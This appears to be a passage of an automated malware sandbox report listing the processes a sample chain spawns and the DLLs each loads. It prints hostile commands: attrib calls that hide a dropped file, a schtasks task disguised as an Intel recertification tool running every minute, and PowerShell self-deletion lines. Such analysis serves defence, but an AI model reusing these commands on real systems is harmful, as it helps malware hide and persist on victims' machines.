                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\attrib.exe attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\explorer.exe explorer.exe
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.1.10.1
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                          Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                          Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                          Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                          Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                          Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                          Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                          Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                          Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                          Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                          Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                          Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                          Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
